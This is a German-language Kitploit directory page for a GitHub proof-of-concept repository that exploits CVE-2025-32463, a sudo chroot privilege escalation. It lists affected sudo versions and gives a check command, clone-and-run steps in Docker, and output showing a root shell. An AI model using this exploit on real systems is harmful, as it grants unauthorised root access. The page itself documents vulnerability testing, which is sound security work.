Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32463 — C-Neuimplementierung des chwoot-PoC | Kitploit
Tools/GitHubGitHub/vpr-labs/cve-2025-32463
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsContainer-AusbruchBinary-Exploitation
GitHubvpr-labs/cve-2025-32463

CVE-2025-32463

C-Neuimplementierung des chwoot-PoC

Repository anzeigen
5vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Stark beeinflusst/kopiert/basiert auf dem Format eines ähnlichen Repositorys von pr0v3rbs -- https://github.com/pr0v3rbs/CVE-2025-32463i\_chwoot.git Dies ist eine C-Neuimplementierung für schnelle Bereitstellung, Ausführung und Bereinigung aus einer einzigen Quelle.

CVE-2025-32463 – sudo-chroot-PoC („chwoot")

Dieses Repository bietet eine minimale, reproduzierbare Umgebung zur Demonstration der CVE‑2025‑32463-Schwachstelle zur Privilege-Eskalation in der chroot-Funktion von sudo.

  • Diese Schwachstelle wurde von Rich Mirch (@0xm1rch auf X) @ Stratascale gemeldet.
  • Originalbeitrag: Vulnerability Advisory: Sudo chroot Elevation of Privilege
  • NVD: CVE-2025-32463 (CVSS 9.3)

Betroffene Versionen

Betroffen sind anfällige Builds von sudo 1.9.14 bis 1.9.17 (alle p‑Revisionen) auf den meisten Linux-Distributionen.

Sicherheitsseiten

  • Ubuntu (CVSS 9.3)
  • Redhat (CVSS 7.8)
  • SUSE (CVSS 7.8)
  • Debian

Inhalt

DateiZweck
DockerfileErstellt ein Ubuntu-24.04-Image mit anfälligem sudo 1.9.16p2 und Build-Werkzeugen
sudo‑chwoot.shProof-of-Concept-Exploit, der eine Root-Shell innerhalb des Chroots startet
run.sh

Schneller Schwachstellen-Check

root@kitploit:~
# Anfälliges sudo
poc ~ $ sudo -R woot woot
sudo: woot: No such file or directory

# Gepatchtes sudo
poc ~ $ sudo -R woot woot
[sudo] password for poc:
sudo: you are not permitted to use the -R option with woot

Exploit im Docker-Container testen

root@kitploit:~
# 1 – Repository klonen
$ git clone https://github.com/vpr-labs/CVE-2025-32463.git
$ cd CVE-2025-32463

# 2 – Docker-Image erstellen und ausführen (Tag "vpr-chwoot")
$ ./run.sh

# 3 – Exploit im Container ausführen (führt Root-Befehl direkt aus)
poc@f722d9182d1f:~$ make && ./vpr-chwoot
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(poc)
root@f722d9182d1f:/#

run.sh übergibt --privileged und --rm an Docker, sodass sich der Container beim Verlassen selbst bereinigt.


Aufräumen

Entferne das Image, wenn du fertig bist:

root@kitploit:~
docker rmi vpr-chwoot

Referenz

  • Stratascale‑CRU-Schwachstellenhinweis: Vulnerability Advisory: Sudo chroot Elevation of Privilege
Tool herunterladen
Hilfsskript, das das Image (falls nötig) erstellt und den Exploit-Container startet